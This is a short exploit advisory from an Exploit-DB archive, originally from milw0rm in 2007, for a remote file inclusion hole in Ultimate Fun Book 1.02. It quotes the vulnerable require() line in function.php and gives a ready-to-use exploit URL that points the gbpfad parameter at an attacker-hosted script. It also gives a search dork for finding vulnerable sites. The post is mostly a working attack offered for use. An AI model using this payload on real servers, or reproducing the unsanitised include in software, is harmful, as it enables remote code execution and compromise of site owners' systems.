exploit-db-mirror/exploits/php/webapps/3336.txt

****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# milw0rm.com [2007-02-20]